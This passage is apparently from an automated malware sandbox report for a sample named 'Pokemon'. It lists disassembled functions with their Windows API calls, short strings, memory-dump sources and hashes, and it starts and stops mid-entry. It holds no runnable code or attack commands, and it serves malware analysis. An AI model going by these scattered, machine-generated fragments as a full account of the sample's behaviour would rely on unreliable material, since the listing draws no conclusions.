                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85E04F70C00204EFCF609FA0E808A5DBBB5FB08310F108419F809E3650C73C5952DF44
                                                                                                                                                                                                                                                                                      Function 001057CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
                                                                                                                                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00105919
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                      • String ID: *$LPT
                                                                                                                                                                                                                                                                                      • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                      • Opcode ID: 2366b9de8023e194deaf364cda4bd1958279644e20ab81ae93b5271d213158df
                                                                                                                                                                                                                                                                                      • Instruction ID: d61ebe9645db6df57764a3f68a4fd076da3b0682a1c890ad20e06128cf56205a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2366b9de8023e194deaf364cda4bd1958279644e20ab81ae93b5271d213158df
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF915075A00604DFDB14DF54C494EAABBF2AF44314F198099E8899F392C7B1EE85CF50
                                                                                                                                                                                                                                                                                      Function 000BE5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __startOneArgErrorHandling.LIBCMT ref: 000BE67D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                                                                                                      • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                      • Opcode ID: db111e07f4fe1abcb6247b52aa652b1d6a6004325321cdd58ce532c89798eebf
                                                                                                                                                                                                                                                                                      • Instruction ID: 00863639fa95f9ad0350653ad1f7127f9ad1c48e48cb839e08f37a729504303c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db111e07f4fe1abcb6247b52aa652b1d6a6004325321cdd58ce532c89798eebf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7516D61E0C14196C7657B14CD01BEE2BE8AB50790F34CD6CF891822E9EF358DD59B4E
                                                                                                                                                                                                                                                                                      Function 000AA8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                                                                      • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                      • Opcode ID: 6cbde9e19361b95cad274456d7906c51d4a6c71fad1b9f5e0880731b707db6ee
                                                                                                                                                                                                                                                                                      • Instruction ID: 447bdb6d1f8cf320a1befe268e12a38a0026ed166c21ebebc134c8d48ad31920
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cbde9e19361b95cad274456d7906c51d4a6c71fad1b9f5e0880731b707db6ee
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B5132716052869FCF25DF69C441AFE7BE0EF16310F648059F895AB2D1DB309E82CB61
                                                                                                                                                                                                                                                                                      Function 000AF6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 000AF6DB
                                                                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 000AF6F4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                      • Opcode ID: b44bdd67fb767806ecaa80becc1f9b199cd056e13bd8c38d0032fc9d77f85156
                                                                                                                                                                                                                                                                                      • Instruction ID: 78a5c233bf52c85201901833c2a2686c8dfb1bfaea540185259b1a63d645aec1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b44bdd67fb767806ecaa80becc1f9b199cd056e13bd8c38d0032fc9d77f85156
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2513A714087449BE720AF10DC85BABB7E8FB85304F81885DF1D9521A6EB308969C766
                                                                                                                                                                                                                                                                                      Function 001161A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                      • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                      • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                      • Opcode ID: 7fc4dad8a14805ba9899066785736134b3e17fa40d283c745110d88c9d3e21aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 7af2293defad0eb3ddea59c6155d3562ac2250c4c8124395253b57f9ec45ad41
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fc4dad8a14805ba9899066785736134b3e17fa40d283c745110d88c9d3e21aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48419F71E002199FCF08DFA8C8859FEBBB5FF69364F104169E506A7252E7729D81CB90
                                                                                                                                                                                                                                                                                      Function 0010DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0010DB75
                                                                                                                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0010DB7F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                                                                      • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                      • Opcode ID: 8659470a458ea727a02a112165b70949bca504016e231b5a8e48ab4209d68045
                                                                                                                                                                                                                                                                                      • Instruction ID: b96d02b90f76daca641ee0ed1ecba59313f76ee9a426fad7ce18bdd4f78b542d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8659470a458ea727a02a112165b70949bca504016e231b5a8e48ab4209d68045
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6317C71C01109ABDF15EFA0DD85EEEBFB9FF05304F104029F815A62A2EB719A16DB60
                                                                                                                                                                                                                                                                                      Function 00124008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 001240BD
                                                                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001240F8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                      • Opcode ID: e4d3896d9209790a22af1e1be3abbdb28d56427803fafd60f836fce81d022058
                                                                                                                                                                                                                                                                                      • Instruction ID: 101651bc4a678571876195dd95f6ee13d333f38916649158eafbd3ad08a357bd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4d3896d9209790a22af1e1be3abbdb28d56427803fafd60f836fce81d022058
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4331BE71110614ABDB24CF68DC80AFB73A9FF48720F008619F9A987190CB70ACA1DB64
                                                                                                                                                                                                                                                                                      Function 00124FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 001250BD
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001250D2
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d8a5e5b6db879adc75583d1115aa3ae28de18f0b6598b9b018ef3e8247e47fc
                                                                                                                                                                                                                                                                                      • Instruction ID: 556a1fdb8acc4d9325e7d01eeaa7376835c1e45e035289c3c79de89e1774f298
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d8a5e5b6db879adc75583d1115aa3ae28de18f0b6598b9b018ef3e8247e47fc
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24316B74A0071A9FDB14CF69D880BDE7BB6FF49300F10406AE904AB391D771A951CF94
                                                                                                                                                                                                                                                                                      Function 001241AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000978B1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: GetStockObject.GDI32(00000011), ref: 000978C5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00097873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000978CF
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00124216
                                                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00124230
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                      • Opcode ID: cda715ee11d275dce96a7e52811c752f8f8e7451c46a3ee52f85a710af7aba1f
                                                                                                                                                                                                                                                                                      • Instruction ID: 78264035fd6961004d5dcf73dd5f4045ffe4959e99699d08488fbda3efb6f9b0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cda715ee11d275dce96a7e52811c752f8f8e7451c46a3ee52f85a710af7aba1f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06112372610219AFDB00DFA9EC45AEA7BF8EB08314F015928F955E3250E774E861AB60
                                                                                                                                                                                                                                                                                      Function 0010D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0010D7C2
                                                                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0010D7EB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                      • Opcode ID: 39c79be90486da146318bdceab218880822bf0ae1a94d8f76f4e896cf294c577
                                                                                                                                                                                                                                                                                      • Instruction ID: cc32aac7b62ef55dcb5cae6c70c0f9d2d9d06948e8ec117427f723bbe1a24145
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c79be90486da146318bdceab218880822bf0ae1a94d8f76f4e896cf294c577
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2112971141232B9D7384BA2AC45EF7BE5CEB127ACF00422AF589830C0D3A48840C2F0
                                                                                                                                                                                                                                                                                      Function 000F75ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 000F761D
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000F7629
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                      • String ID: STOP
                                                                                                                                                                                                                                                                                      • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                      • Opcode ID: dbce29acf8c2554941032e9e9b25282ea0a8640f1040e1c297da7945a24c204b
                                                                                                                                                                                                                                                                                      • Instruction ID: 53c0dcc219d22ce89940b03a361afcfa7d5548943afd675bee6da2f50d8ea1c8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbce29acf8c2554941032e9e9b25282ea0a8640f1040e1c297da7945a24c204b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0010032A0892A8BCB60AFBCDC408BF33F5AB607547400524E929D7692EB30D900E281
                                                                                                                                                                                                                                                                                      Function 000F262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000F2699
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 2f5981b14adc98e3b7ea8433d6832f06a5467d524333addd362330d0cdf98845
                                                                                                                                                                                                                                                                                      • Instruction ID: 93f41eeeee0f3e7a2819a93a20f727ccbcee47fc2d67e7189c029228196d467e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f5981b14adc98e3b7ea8433d6832f06a5467d524333addd362330d0cdf98845
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7001D475A01218ABCF04EBA4DC55CFE77A8EF46760B400619B932A76C2EB35590CEA90
                                                                                                                                                                                                                                                                                      Function 000F2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 000F2593
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
